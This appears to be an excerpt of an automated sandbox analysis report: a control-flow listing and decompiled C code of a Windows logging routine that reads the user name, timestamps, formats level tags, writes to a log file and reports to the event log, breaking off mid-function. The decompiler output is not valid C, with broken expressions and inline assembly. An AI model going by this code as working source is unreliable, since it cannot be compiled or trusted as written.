12a9b11-12a9b7b call 129e540 call 12994d0 41->46 42->43 52 12a9c96-12a9ca2 call 12a1ee0 43->52 53 12a9ca7-12a9ca9 43->53 80 12a9bbb-12a9bbe call 1298500 46->80 81 12a9b7d-12a9b82 46->81 48->59 52->53 57 12a9cab-12a9cb2 53->57 58 12a9cbf-12a9cd4 call 12aa9a0 53->58 54->15 65 12a9cb6-12a9cba call 12a1ee0 57->65 66 12a9cb4 57->66 77 12a9d08-12a9d0e 58->77 78 12a9cd6-12a9ce8 58->78 59->41 69 12a9ad8-12a9ae6 59->69 65->58 66->65 74 12a9ae8-12a9af6 69->74 75 12a9afc-12a9b06 call 12cae27 69->75 74->54 74->75 75->41 77->3 84 12a9d10-12a9d22 77->84 82 12a9cea-12a9cf8 78->82 83 12a9cfe-12a9d05 call 12cae27 78->83 80->23 87 12a9b9c-12a9ba4 81->87 88 12a9b84-12a9b8b 81->88 82->15 82->83 83->77 90 12a9d34-12a9d3e call 12cae27 84->90 91 12a9d24-12a9d32 84->91 87->80 95 12a9ba6-12a9bad 87->95 93 12a9b8f-12a9b99 call 12a1ee0 88->93 94 12a9b8d 88->94 90->3 91->15 91->90 93->87 94->93 99 12a9baf 95->99 100 12a9bb1-12a9bb6 call 12a1ee0 95->100 99->100 100->80
              C-Code - Quality: 66%
              			E012A98F0(void* __ebx, long __edi, void* __fp0, intOrPtr _a4, intOrPtr* _a8, intOrPtr* _a12, signed int _a16) {
				char* _v4;
				char _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				int _v32;
				char _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				signed int _v68;
				long _v72;
				signed int _v76;
				int _v80;
				signed int _v92;
				long _v96;
				signed int _v100;
				long _v104;
				void* _v108;
				struct _FILETIME _v116;
				int _v120;
				long _v124;
				long _v128;
				intOrPtr* _v132;
				void* _v136;
				char _v144;
				char _v164;
				char _v172;
				signed int _v176;
				signed int _v180;
				int _v200;
				signed int _v228;
				intOrPtr _v232;
				short _v248;
				signed int _v252;
				short _v272;
				signed int _v276;
				short _v296;
				char _v300;
				char _v301;
				void* _v308;
				signed int _v312;
				void _v316;
				union _LARGE_INTEGER _v320;
				long _v324;
				signed int _v328;
				long _v332;
				WCHAR* _v336;
				struct _CRITICAL_SECTION* _v340;
				intOrPtr _v344;
				char* _v348;
				char* _v352;
				intOrPtr _v356;
				char _v360;
				signed int _v460;
				signed int _v528;
				void* __esi;
				void* __ebp;
				signed int _t489;
				signed int _t490;
				signed int _t495;
				signed int _t500;
				signed int _t501;
				signed int _t510;
				signed int _t513;
				signed int _t522;
				signed int _t523;
				signed char _t524;
				intOrPtr _t532;
				int _t539;
				signed int _t540;
				intOrPtr _t545;
				intOrPtr _t549;
				intOrPtr _t553;
				int _t557;
				intOrPtr _t560;
				long _t563;
				signed int _t569;
				signed int _t576;
				signed int _t577;
				signed char _t579;
				signed int _t582;
				signed int _t586;
				signed int _t588;
				signed char _t590;
				signed char _t591;
				void _t595;
				int _t597;
				void _t602;
				int _t604;
				signed int _t616;
				void* _t617;
				struct _OVERLAPPED* _t619;
				signed int _t620;
				signed int _t629;
				signed int _t630;
				signed int _t632;
				long _t640;
				void* _t644;
				long _t654;
				intOrPtr* _t658;
				intOrPtr* _t661;
				signed int _t664;
				void* _t666;
				long _t669;
				void* _t673;
				long _t676;
				void* _t683;
				signed int _t684;
				signed int _t687;
				signed int _t694;
				signed char _t695;
				intOrPtr* _t700;
				signed int* _t704;
				signed int _t705;
				intOrPtr _t708;
				intOrPtr _t711;
				int* _t717;
				long _t719;
				int* _t720;
				signed int _t721;
				long _t723;
				long _t724;
				int _t737;
				int _t739;
				void* _t741;
				intOrPtr* _t752;
				void* _t753;
				signed int _t754;
				void* _t755;
				signed int _t760;
				signed int _t767;
				signed int _t768;
				signed int _t769;
				signed int _t770;
				signed int _t771;
				void* _t772;
				signed int _t773;
				signed int _t775;
				void* _t776;
				void* _t777;
				void* _t778;
				int _t779;
				intOrPtr _t780;
				long _t781;
				long _t782;
				long _t785;
				signed int _t791;
				signed int* _t792;
				signed int _t798;
				signed int* _t799;
				long* _t800;
				long _t809;
				long _t817;
				intOrPtr _t818;
				intOrPtr _t821;
				long _t828;
				short* _t831;
				signed int _t834;
				char _t835;
				intOrPtr _t837;
				void* _t841;
				long* _t844;
				void* _t853;
				signed int _t855;
				signed int _t856;
				signed int _t857;
				signed int _t858;
				int _t860;
				intOrPtr _t866;
				intOrPtr _t868;
				void* _t869;
				void* _t870;
				void* _t871;
				signed int _t873;
				signed int _t874;
				void* _t875;
				void* _t876;
				void* _t883;
				void** _t884;
				void* _t885;
				void* _t889;
				void* _t890;
				void* _t892;
				signed int _t893;
				signed int* _t895;
				int* _t897;
				int* _t898;
				signed int _t900;
				signed int _t902;
				void* _t904;
				signed int _t908;
				signed int _t909;
				void* _t912;
				int* _t918;
				int* _t919;
				int* _t921;
				long* _t924;
				void* _t927;
				void* _t967;

				_t967 = __fp0;
				_t882 = __edi;
				_t900 = _t908;
				_push(0xffffffff);
				_push(0x12ea20f);
				_push( *[fs:0x0]);
				_t909 = _t908 - 0x7c;
				_t489 =  *0x1309018; // 0xedd8d3b4
				_t490 = _t489 ^ _t900;
				_v20 = _t490;
				_push(__ebx);
				_push(_t888);
				_push(__edi);
				_push(_t490);
				 *[fs:0x0] =  &_v16;
				asm("xorps xmm0, xmm0");
				_t752 = _a8;
				_v132 = _a12;
				_t493 = 0;
				_v92 = 0;
				asm("movlpd [ebp-0x70], xmm0");
				_v124 = 0;
				_v76 = 0;
				_v72 = 7;
				_v92 = 0;
				_v8 = 0;
				_v68 = 0;
				_v52 = 0;
				_v48 = 7;
				_v68 = 0;
				_v44 = 0;
				_v28 = 0;
				_v24 = 7;
				_v44 = 0;
				_v136 = 0x130b6d4;
				EnterCriticalSection(0x130b6d4);
				_v8 = 3;
				if( *0x1309ac0 == 0) {
					L55:
					LeaveCriticalSection(0x130b6d4);
					goto L56;
				} else {
					_t927 = _a4 -  *0x1309a9c; // 0x1
					if(_t927 < 0) {
						goto L55;
					} else {
						_t493 = _a16;
						if(_t493 == 0x80000000 || ( *0x1309aa0 & _t493) != 0) {
							_t695 =  *0x1309a98; // 0xffffffff
							if((_t695 & 0x00000001) == 0) {
								_v128 = _v116.dwHighDateTime;
							} else {
								GetSystemTimeAsFileTime( &_v116);
								_t854 = _v116.dwHighDateTime;
								_t695 =  *0x1309a98; // 0xffffffff
								_v128 = _v116.dwHighDateTime;
							}
							_v116.dwHighDateTime = _v116.dwLowDateTime;
							if((_t695 & 0x00000002) != 0) {
								_v124 = GetCurrentThreadId();
								_t695 =  *0x1309a98; // 0xffffffff
							}
							if((_t695 & 0x00000004) == 0) {
								L35:
								_v8 = 2;
								LeaveCriticalSection(0x130b6d4);
								_push(0x78);
								_t888 = E012CAE5D(_t752, _t882, _t888, _t948);
								_t909 = _t909 + 4;
								_v136 = _t888;
								 *_t888 = 0;
								 *(_t888 + 0x10) = 0;
								 *(_t888 + 0x14) = 7;
								 *_t888 = 0;
								_t96 = _t888 + 0x18; // 0x18
								_t831 = _t96;
								 *_t831 = 0;
								 *((intOrPtr*)(_t831 + 0x10)) = 0;
								 *(_t831 + 0x14) = 7;
								 *_t831 = 0;
								 *((intOrPtr*)(_t888 + 0x30)) = 0;
								 *((intOrPtr*)(_t888 + 0x40)) = 0;
								 *(_t888 + 0x44) = 7;
								 *((short*)(_t888 + 0x30)) = 0;
								_t103 = _t888 + 0x48; // 0x48
								_t882 = _t103;
								 *_t882 = 0;
								 *((intOrPtr*)(_t882 + 0x10)) = 0;
								 *(_t882 + 0x14) = 7;
								 *_t882 = 0;
								_v8 = 0xa;
								 *((intOrPtr*)(_t888 + 0x70)) = _a4;
								 *(_t888 + 0x74) = _a16;
								_t700 = _v132;
								if(_t888 != _t700) {
									_t837 =  *((intOrPtr*)(_t700 + 0x10));
									if( *((intOrPtr*)(_t700 + 0x14)) >= 8) {
										_t700 =  *_t700;
									}
									E012A1EE0(_t752, _t888, 0, _t882, _t888, _t700, _t837);
									_t114 = _t888 + 0x18; // 0x18
									_t831 = _t114;
								}
								 *((intOrPtr*)(_t888 + 0x60)) = _v124;
								 *(_t888 + 0x68) = _v116.dwHighDateTime;
								 *((intOrPtr*)(_t888 + 0x6c)) = _v128;
								_t704 =  &_v68;
								if(_t831 != _t704) {
									_t713 =  >=  ? _v68 : _t704;
									E012A1EE0(_t752, _t831, 0, _t882, _t888,  >=  ? _v68 : _t704, _v52);
								}
								_t493 =  &_v44;
								_t126 = _t888 + 0x30; // 0x30
								_t832 = _t126;
								if(_t126 != _t493) {
									_t712 =  >=  ? _v44 : _t493;
									_t493 = E012A1EE0(_t752, _t832, 0, _t882, _t888,  >=  ? _v44 : _t493, _v28);
								}
								if(_t882 != _t752) {
									_t131 = _t752 + 0x10; // 0x0
									_t711 =  *_t131;
									if( *((intOrPtr*)(_t752 + 0x14)) >= 8) {
										_t752 =  *_t752;
									}
									_t493 = E012A1EE0(_t752, _t882, 0, _t882, _t888, _t752, _t711);
								}
								_push(_t888);
								_v8 = 2;
								L236();
								_t873 = _v24;
								if(_t873 < 8) {
									L51:
									_t874 = _v48;
									if(_t874 < 8) {
										L56:
										_t854 = _v72;
										if(_t854 < 8) {
											L60:
											 *[fs:0x0] = _v16;
											_pop(_t883);
											_pop(_t889);
											_pop(_t753);
											return E012CAE19(_t493, _t753, _v20 ^ _t900, _t854, _t883, _t889);
										} else {
											_t760 = _v92;
											_t854 = 2 + _t854 * 2;
											_t495 = _t760;
											if(_t854 < 0x1000) {
												L59:
												_push(_t854);
												_t493 = E012CAE27(_t760);
												goto L60;
											} else {
												_t760 =  *(_t760 - 4);
												_t854 = _t854 + 0x23;
												if(_t495 - _t760 + 0xfffffffc > 0x1f) {
													goto L63;
												} else {
													goto L59;
												}
											}
										}
									} else {
										_t834 = _v68;
										_t875 = 2 + _t874 * 2;
										_t705 = _t834;
										if(_t875 < 0x1000) {
											L54:
											_push(_t875);
											_t493 = E012CAE27(_t834);
											_t909 = _t909 + 8;
											goto L56;
										} else {
											_t760 =  *(_t834 - 4);
											_t854 = _t875 + 0x23;
											if(_t705 - _t760 + 0xfffffffc > 0x1f) {
												goto L63;
											} else {
												goto L54;
											}
										}
									}
								} else {
									_t835 = _v44;
									_t876 = 2 + _t873 * 2;
									_t708 = _t835;
									if(_t876 < 0x1000) {
										L50:
										_push(_t876);
										_t493 = E012CAE27(_t835);
										_t909 = _t909 + 8;
										goto L51;
									} else {
										_t760 =  *(_t835 - 4);
										_t854 = _t876 + 0x23;
										if(_t708 - _t760 + 0xfffffffc > 0x1f) {
											goto L63;
										} else {
											goto L50;
										}
									}
								}
							} else {
								_v120 = 0;
								_t840 =  >=  ? _v92 :  &_v92;
								_v76 = 0;
								 *((short*)( >=  ? _v92 :  &_v92)) = 0;
								_t717 =  &_v120;
								__imp__GetUserNameExW(2, 0, _t717); // executed
								if(_t717 != 0) {
									L12:
									_t888 = 0;
									_t719 = _v120 + 1;
									_v108 = 0;
									_t882 = 0;
									_v96 = _t719;
									_v104 = 0;
									_v100 = 0;
									if(_t719 == 0) {
										L15:
										_t720 =  &_v120;
										_v8 = 4;
										__imp__GetUserNameExW(2, _t888, _t720);
										if(_t720 != 0) {
											_t841 = _t888;
											_t59 = _t841 + 2; // 0x2
											_t854 = _t59;
											do {
												_t721 =  *_t841;
												_t841 = _t841 + 2;
												__eflags = _t721;
											} while (_t721 != 0);
											_t760 =  &_v92;
											E012A1EE0(_t752, _t760, _t854, _t882, _t888, _t888, _t841 - _t854 >> 1);
											_t723 = 0;
											__eflags = 0;
										} else {
											_t723 = GetLastError();
										}
										_v96 = _t723;
										_v8 = 3;
										if(_t888 == 0) {
											goto L24;
										} else {
											_t741 = _t888;
											_t882 = (_t882 - _t888 >> 1) + (_t882 - _t888 >> 1);
											if(_t882 < 0x1000) {
												L23:
												_push(_t882);
												E012CAE27(_t888);
												_t723 = _v96;
												_t909 = _t909 + 8;
												goto L24;
											} else {
												_t888 =  *(_t888 - 4);
												_t882 = _t882 + 0x23;
												if(_t741 - _t888 + 0xfffffffc > 0x1f) {
													goto L62;
												} else {
													goto L23;
												}
											}
										}
									} else {
										if(_t719 > 0x7fffffff) {
											E0129CEE0(_t752, _t853, 0);
											L62:
											E012CF35F(_t752, _t760, _t854, __eflags);
											L63:
											E012CF35F(_t752, _t760, _t854, __eflags);
											asm("int3");
											asm("int3");
											_push(_t900);
											_t902 = _t909;
											_push(0xffffffff);
											_push(0x12ea28e);
											_push( *[fs:0x0]);
											_t912 = _t909 - 0x154;
											_t500 =  *0x1309018; // 0xedd8d3b4
											_t501 = _t500 ^ _t902;
											_v176 = _t501;
											_push(_t752);
											_push(_t888);
											_push(_t882);
											_push(_t501);
											 *[fs:0x0] =  &_v172;
											_t884 = _t760;
											_v200 = 0;
											_v460 = _t760 | 0xffffffff;
											_v180 = 7;
											_v200 = 0;
											_v164 = 0;
											_v272 = 0;
											_v252 = 7;
											_v272 = 0;
											_v296 = 0;
											_v276 = 7;
											_v296 = 0;
											_v248 = 0;
											_v232 = 0;
											_v228 = 7;
											_v248 = 0;
											asm("xorps xmm0, xmm0");
											_v164 = 3;
											asm("movlpd [ebp-0x140], xmm0");
											while(1) {
												L65:
												_t754 = ReleaseMutex;
												while(1) {
													L66:
													__eflags = _v28 - 8;
													_v32 = 0;
													_t505 =  >=  ? _v48 :  &_v48;
													__eflags = _v100 - 8;
													_v104 = 0;
													_v128 = 0;
													 *( >=  ? _v48 :  &_v48) = 0;
													_t507 =  >=  ? _v120 :  &_v120;
													__eflags = _v124 - 8;
													 *((short*)( >=  ? _v120 :  &_v120)) = 0;
													_t509 =  >=  ? _v144 :  &_v144;
													 *((short*)( >=  ? _v144 :  &_v144)) = 0;
													_t510 = WaitForSingleObject(_t884[0xf], 0xffffffff);
													__eflags = _t510;
													if(_t510 != 0) {
														break;
													}
													ReleaseMutex(_t884[0xf]);
													__eflags = _t884[0xd];
													if(_t884[0xd] != 0) {
														ResetEvent(_t884[0x10]);
														_t888 = WaitForSingleObject;
														goto L86;
													} else {
														_t888 = WaitForSingleObject;
														_t694 = WaitForSingleObject(_t884[0x10], 0xffffffff);
														__eflags = _t694;
														if(_t694 == 0) {
															L86:
															_t569 = WaitForSingleObject(_t884[0xf], 0xffffffff);
															__eflags = _t569;
															if(_t569 != 0) {
																break;
															} else {
																_t888 = _t884[0xd];
																__eflags = _t888;
																if(_t888 != 0) {
																	__eflags = _t888 - _t884[0xe];
																	if(_t888 != _t884[0xe]) {
																		_t884[0xd] =  *(_t888 + 4);
																	} else {
																		_t884[0xd] = 0;
																		_t884[0xe] = 0;
																		SetEvent(_t884[0x11]);
																	}
																	ReleaseMutex(_t884[0xf]);
																	_t754 =  *_t888;
																	_push(0xc);
																	E012CAE27(_t888);
																	_t912 = _t912 + 8;
																	__eflags = _t754;
																	if(_t754 == 0) {
																		break;
																	} else {
																		_v340 = 0x130b6d4;
																		EnterCriticalSection(0x130b6d4);
																		_v12 = 4;
																		_t888 = 0;
																		_t782 = _t884[0x12];
																		__eflags = _t884[0x13] - _t782 >> 3;
																		if(_t884[0x13] - _t782 >> 3 != 0) {
																			do {
																				_t687 =  *(_t782 + _t888 * 8);
																				__eflags = _t687;
																				if(_t687 != 0) {
																					 *_t687(_t754,  *((intOrPtr*)(_t782 + 4 + _t888 * 8)));
																					_t912 = _t912 + 8;
																				}
																				_t888 = _t888 + 1;
																				_t782 = _t884[0x12];
																				__eflags = _t888 - _t884[0x13] - _t782 >> 3;
																			} while (_t888 < _t884[0x13] - _t782 >> 3);
																		}
																		_t576 =  *((intOrPtr*)(_t754 + 0x74));
																		_v312 = _t576;
																		__eflags = _t576 - 0x80000000;
																		if(_t576 == 0x80000000) {
																			_v312 = _t884[4];
																		}
																		__eflags = _t884[2] & 0x00000008;
																		_v301 = 0;
																		if((_t884[2] & 0x00000008) != 0) {
																			_t684 =  *(_t754 + 0x70);
																			__eflags = _t684 - 5;
																			if(_t684 > 5) {
																				_push(6);
																				_push(L"UNKNW,");
																				goto L110;
																			} else {
																				switch( *((intOrPtr*)(_t684 * 4 +  &M012AA7E4))) {
																					case 0:
																						_push(6);
																						_push(L"DEBUG,");
																						goto L110;
																					case 1:
																						_push(6);
																						_push(L"INFO ,");
																						goto L110;
																					case 2:
																						_push(6);
																						__ecx =  &_v48;
																						__eax = E01299A40(__ecx, __fp0, L"WARN ,");
																						_v301 = 1;
																						goto L111;
																					case 3:
																						_push(6);
																						__ecx =  &_v48;
																						__eax = E01299A40(__ecx, __fp0, L"ERROR,");
																						_v301 = 1;
																						goto L111;
																					case 4:
																						_push(6);
																						__ecx =  &_v48;
																						__eax = E01299A40(__ecx, __fp0, L"CRTCL,");
																						_v301 = 1;
																						goto L111;
																					case 5:
																						_push(6);
																						_push(L"NONE ,");
																						L110:
																						_t782 =  &_v48;
																						E01299A40(_t782, _t967);
																						goto L111;
																				}
																			}
																		}
																		L111:
																		_t577 = _v312;
																		__eflags = _t577 & 0x00000001;
																		if((_t577 & 0x00000001) == 0) {
																			L121:
																			__eflags = _t884[0xc];
																			if(_t884[0xc] == 0) {
																				__eflags = _t577 & 0x00000002;
																				if((_t577 & 0x00000002) == 0) {
																					L187:
																					_t888 = _v308;
																					goto L188;
																				} else {
																					_t590 = _t884[2];
																					__eflags = _t590 & 0x00000001;
																					if((_t590 & 0x00000001) == 0) {
																						L130:
																						__eflags = _t590 & 0x00000008;
																						if((_t590 & 0x00000008) != 0) {
																							_t664 =  *(_t754 + 0x70);
																							__eflags = _t664 - 5;
																							if(_t664 > 5) {
																								_push(6);
																								_push(L"UNKNW,");
																							} else {
																								switch( *((intOrPtr*)(_t664 * 4 +  &M012AA7FC))) {
																									case 0:
																										_push(6);
																										_push(L"DEBUG,");
																										goto L140;
																									case 1:
																										_push(6);
																										_push(L"INFO ,");
																										goto L140;
																									case 2:
																										_push(6);
																										_push(L"WARN ,");
																										goto L140;
																									case 3:
																										_push(6);
																										_push(L"ERROR,");
																										goto L140;
																									case 4:
																										_push(6);
																										_push(L"CRTCL,");
																										goto L140;
																									case 5:
																										_push(6);
																										_push(L"NONE ,");
																										goto L140;
																								}
																							}
																							L140:
																							E01299A40( &_v48, _t967);
																						}
																						_t591 = _t884[2];
																						__eflags = _t591 & 0x00000004;
																						if((_t591 & 0x00000004) != 0) {
																							__eflags =  *((intOrPtr*)(_t754 + 0x44)) - 8;
																							_t658 = _t754 + 0x30;
																							_t818 =  *((intOrPtr*)(_t658 + 0x10));
																							if( *((intOrPtr*)(_t754 + 0x44)) >= 8) {
																								_t658 =  *_t658;
																							}
																							_push(_t818);
																							E01299A40( &_v48, _t967, _t658);
																							_push(1);
																							E01299A40( &_v48, _t967, ",");
																							__eflags =  *((intOrPtr*)(_t754 + 0x2c)) - 8;
																							_t661 = _t754 + 0x18;
																							_t821 =  *((intOrPtr*)(_t661 + 0x10));
																							if( *((intOrPtr*)(_t754 + 0x2c)) >= 8) {
																								_t661 =  *_t661;
																							}
																							_push(_t821);
																							E01299A40( &_v48, _t967, _t661);
																							_push(1);
																							E01299A40( &_v48, _t967, ",");
																							_t591 = _t884[2];
																						}
																						__eflags = _t591 & 0x00000002;
																						if(__eflags == 0) {
																							L153:
																							__eflags = _t591 & 0x00000010;
																							if((_t591 & 0x00000010) == 0) {
																								L161:
																								__eflags =  &_v96 - _t754;
																								if( &_v96 != _t754) {
																									__eflags =  *((intOrPtr*)(_t754 + 0x14)) - 8;
																									_t632 = _t754;
																									if( *((intOrPtr*)(_t754 + 0x14)) >= 8) {
																										_t632 =  *_t754;
																									}
																									E012A1EE0(_t754,  &_v96, _t854, _t884, _t888, _t632,  *((intOrPtr*)(_t754 + 0x10)));
																								}
																								_v348 = L" \t\n\r";
																								_v344 = 0x12fcdf4;
																								E0129A2D0( &_v68,  &_v348);
																								_t918 = _t912 - 0x14;
																								_v12 = 7;
																								_t595 = _v52;
																								_t897 = _t918;
																								_t897[4] = _t595;
																								_v308 =  &(_t897[4]);
																								 *_t897 = 0;
																								__eflags = _t595 - 8;
																								if(__eflags > 0) {
																									_t791 =  ~(0 | __eflags > 0x00000000) | _t595 * 0x00000002;
																									__eflags = _t791;
																									_push(_t791);
																									_t597 = E012CAE8D(_t754, _t884, _t897, _t791);
																									 *_t897 = _t597;
																									_t918 =  &(_t918[1]);
																									_t792 = _v68;
																									_t897 = _t597;
																									_t595 =  *_v308;
																								} else {
																									_t792 =  &_v68;
																								}
																								E012CC800(_t897, _t792, _t595 + _t595);
																								_t919 =  &(_t918[3]);
																								E012A8E30(_t754,  &_v96);
																								_t602 = _v52;
																								_t898 = _t919;
																								_t898[4] = _t602;
																								_v308 =  &(_t898[4]);
																								 *_t898 = 0;
																								__eflags = _t602 - 8;
																								if(__eflags > 0) {
																									_t798 =  ~(0 | __eflags > 0x00000000) | _t602 * 0x00000002;
																									__eflags = _t798;
																									_push(_t798);
																									_t604 = E012CAE8D(_t754, _t884, _t898, _t798);
																									 *_t898 = _t604;
																									_t919 =  &(_t919[1]);
																									_t799 = _v68;
																									_t898 = _t604;
																									_t602 =  *_v308;
																								} else {
																									_t799 =  &_v68;
																								}
																								E012CC800(_t898, _t799, _t602 + _t602);
																								_t800 =  &_v96;
																								E012AABF0(_t800);
																								_t921 =  &(_t919[8]);
																								_v12 = 4;
																								__eflags = _v52 - 8;
																								if(_v52 > 8) {
																									_t630 = _v68;
																									__eflags = _t630;
																									if(_t630 != 0) {
																										E012CAE58(_t630);
																										_t921 =  &(_t921[1]);
																									}
																								}
																								_push(_t800);
																								E012AAA10( &_v96);
																								__eflags = _v76 - 8;
																								_t611 =  >=  ? _v96 :  &_v96;
																								_push(_v80);
																								E01299A40( &_v48, _t967,  >=  ? _v96 :  &_v96);
																								E012AAAB0( &_v48, "\r");
																								_t854 = "\n";
																								E012AAAB0( &_v48, "\n");
																								_push(2);
																								E01299A40( &_v48, _t967, L"\r\n");
																								_t782 =  &(_t884[5]);
																								_t616 = E012C5F50(_t754, _t782, __eflags, _t967);
																								_t912 =  &(_t921[1]) - 8 + 8;
																								_v308 = _t616;
																								__eflags = _t616 - 0xffffffff;
																								if(_t616 == 0xffffffff) {
																									goto L187;
																								} else {
																									_t782 =  &_v328;
																									__imp__GetFileSizeEx(_t616, _t782);
																									__eflags = _t616;
																									if(_t616 == 0) {
																										goto L187;
																									} else {
																										_t782 = _v324;
																										_t617 = _t884[0xb];
																										__eflags = _t782;
																										if(__eflags < 0) {
																											L182:
																											_t888 = _v308;
																											goto L183;
																										} else {
																											if(__eflags > 0) {
																												L179:
																												_t782 = _v308;
																												_t854 =  &(_t884[5]);
																												_t888 = E012C6600(_t754, _t782,  &(_t884[5]), _t884, _t898, __eflags, _t967);
																												_v308 = _t888;
																												__eflags = _t888 - 0xffffffff;
																												if(_t888 != 0xffffffff) {
																													_t629 =  &_v328;
																													__imp__GetFileSizeEx(_t888, _t629);
																													__eflags = _t629;
																													if(_t629 != 0) {
																														_t782 = _v324;
																														L183:
																														_t619 = _v328 | _t782;
																														__eflags = _t619;
																														if(_t619 == 0) {
																															_v316 = 0xfeff;
																															WriteFile(_t888,  &_v316, 2,  &_v332, _t619);
																														}
																														_push(2);
																														asm("xorps xmm0, xmm0");
																														asm("movlpd [ebp-0x138], xmm0");
																														_t620 = SetFilePointerEx(_t888, _v320, _v316, 0);
																														__eflags = _t620;
																														if(_t620 != 0) {
																															_t854 =  &_v332;
																															__eflags = _v28 - 8;
																															_t782 = _v32 + _v32;
																															_t623 =  >=  ? _v48 :  &_v48;
																															WriteFile(_t888,  >=  ? _v48 :  &_v48, _t782,  &_v332, 0);
																														}
																													}
																												}
																											} else {
																												__eflags = _v328 - _t617;
																												if(__eflags <= 0) {
																													goto L182;
																												} else {
																													goto L179;
																												}
																											}
																										}
																									}
																								}
																								L188:
																								CloseHandle(_t888);
																								__eflags =  *_t884;
																								if( *_t884 != 0) {
																									_t579 = _v312;
																									__eflags = _t579 & 0x00000004;
																									if((_t579 & 0x00000004) != 0) {
																										__eflags =  *(_t754 + 0x70) - 1;
																										if( *(_t754 + 0x70) >= 1) {
																											__eflags =  &_v48 - _t754;
																											if( &_v48 != _t754) {
																												__eflags =  *((intOrPtr*)(_t754 + 0x14)) - 8;
																												_t588 = _t754;
																												if( *((intOrPtr*)(_t754 + 0x14)) >= 8) {
																													_t588 =  *_t754;
																												}
																												_t782 =  &_v48;
																												E012A1EE0(_t754, _t782, _t854, _t884, _t888, _t588,  *((intOrPtr*)(_t754 + 0x10)));
																											}
																											_push(_t782);
																											E012AAB50( &_v48);
																											_t582 =  *(_t754 + 0x70);
																											_t912 = _t912 + 4;
																											__eflags = _t582 - 1;
																											if(_t582 > 1) {
																												__eflags = _t582 - 2;
																												if(_t582 > 2) {
																													_t785 = 0x65;
																													_t860 = 1;
																												} else {
																													_t785 = 0x66;
																													_t860 = 2;
																												}
																											} else {
																												_t785 = 0x67;
																												_t860 = 4;
																											}
																											__eflags = _v28 - 8;
																											_t584 =  >=  ? _v48 :  &_v48;
																											_v336 =  >=  ? _v48 :  &_v48;
																											_t586 = ReportEventW( *_t884, _t860, 0, _t785, 0, 1, 0,  &_v336, 0);
																											__eflags = _t586;
																											if(_t586 == 0) {
																												GetLastError();
																											}
																										}
																									}
																								}
																								L211();
																								_push(0x78);
																								_t522 = E012CAE27(_t754);
																								_t912 = _t912 + 8;
																								_v12 = 3;
																								goto L203;
																							} else {
																								_t866 =  *((intOrPtr*)(_t754 + 0x58));
																								_t767 = _t754 + 0x48;
																								__eflags = 0x7ffffffe - _t866 - 1;
																								if(0x7ffffffe - _t866 < 1) {
																									goto L208;
																								} else {
																									__eflags =  *((intOrPtr*)(_t767 + 0x14)) - 8;
																									if( *((intOrPtr*)(_t767 + 0x14)) >= 8) {
																										_t767 =  *_t767;
																									}
																									E01299780( &_v72, _v340, _t767, _t767, _t866, ",", 1);
																									_v12 = 6;
																									__eflags = _v52 - 8;
																									_push(_v56);
																									_t638 =  >=  ? _v72 :  &_v72;
																									E01299A40( &_v48, _t967,  >=  ? _v72 :  &_v72);
																									_v12 = 4;
																									_t854 = _v52;
																									__eflags = _t854 - 8;
																									if(_t854 < 8) {
																										goto L161;
																									} else {
																										_t809 = _v72;
																										_t854 = 2 + _t854 * 2;
																										_t640 = _t809;
																										__eflags = _t854 - 0x1000;
																										if(_t854 < 0x1000) {
																											L160:
																											_push(_t854);
																											E012CAE27(_t809);
																											_t912 = _t912 + 8;
																											goto L161;
																										} else {
																											_t767 =  *(_t809 - 4);
																											_t858 = _t854 + 0x23;
																											__eflags = _t640 - _t767 + 0xfffffffc - 0x1f;
																											if(__eflags > 0) {
																												goto L207;
																											} else {
																												goto L160;
																											}
																										}
																									}
																								}
																							}
																						} else {
																							_t644 = E012986F0( &_v300, __eflags, L"%d,");
																							_v12 = 5;
																							_v360 = _t754 + 0x60;
																							_v356 = E01298060;
																							_v352 =  &M012AADD0;
																							L0129A0B0(E0129BDD0(_t754, _t644,  &_v360, _t884), _t967,  &_v72);
																							E012982B0(_t754,  &_v120,  &_v72);
																							_t854 = _v52;
																							__eflags = _t854 - 8;
																							if(_t854 < 8) {
																								L152:
																								_v12 = 4;
																								E01297850( &_v300, _t884, _t888);
																								__eflags = _v100 - 8;
																								_push(_v104);
																								_t652 =  >=  ? _v120 :  &_v120;
																								E01299A40( &_v48, _t967,  >=  ? _v120 :  &_v120);
																								_t591 = _t884[2];
																								goto L153;
																							} else {
																								_t817 = _v72;
																								_t854 = 2 + _t854 * 2;
																								_t654 = _t817;
																								__eflags = _t854 - 0x1000;
																								if(_t854 < 0x1000) {
																									L151:
																									_push(_t854);
																									E012CAE27(_t817);
																									_t912 = _t912 + 8;
																									goto L152;
																								} else {
																									_t767 =  *(_t817 - 4);
																									_t858 = _t854 + 0x23;
																									__eflags = _t654 - _t767 + 0xfffffffc - 0x1f;
																									if(__eflags > 0) {
																										goto L207;
																									} else {
																										goto L151;
																									}
																								}
																							}
																						}
																					} else {
																						_t666 = E012A90C0(_t754,  &_v72, _t884, _t888, _t967,  *((intOrPtr*)(_t754 + 0x68)),  *((intOrPtr*)(_t754 + 0x6c)));
																						_t912 = _t912 + 8;
																						E012982B0(_t754,  &_v48, _t666);
																						_t854 = _v52;
																						__eflags = _t854 - 8;
																						if(_t854 < 8) {
																							L129:
																							_push(1);
																							E01299A40( &_v48, _t967, ",");
																							_t590 = _t884[2];
																							goto L130;
																						} else {
																							_t828 = _v72;
																							_t854 = 2 + _t854 * 2;
																							_t669 = _t828;
																							__eflags = _t854 - 0x1000;
																							if(_t854 < 0x1000) {
																								L128:
																								_push(_t854);
																								E012CAE27(_t828);
																								_t912 = _t912 + 8;
																								goto L129;
																							} else {
																								_t767 =  *(_t828 - 4);
																								_t858 = _t854 + 0x23;
																								__eflags = _t669 - _t767 + 0xfffffffc - 0x1f;
																								if(__eflags > 0) {
																									goto L207;
																								} else {
																									goto L128;
																								}
																							}
																						}
																					}
																				}
																			} else {
																				_v12 = 3;
																				LeaveCriticalSection(0x130b6d4);
																				goto L65;
																			}
																		} else {
																			_t673 = E012D0C2A(1);
																			_t912 = _t912 + 4;
																			_t888 = _t673;
																			__eflags = _v301;
																			if(_v301 != 0) {
																				_t683 = E012D0C2A(2);
																				_t912 = _t912 + 4;
																				_t888 = _t683;
																			}
																			_t782 =  &_v72;
																			E012983B0(_t782, _t754);
																			__eflags =  *0x130b6b4;
																			if( *0x130b6b4 == 0) {
																				__eflags = _v52 - 8;
																				_t681 =  >=  ? _v72 :  &_v72;
																				E012A9090(_t888, L"%s\n",  >=  ? _v72 :  &_v72);
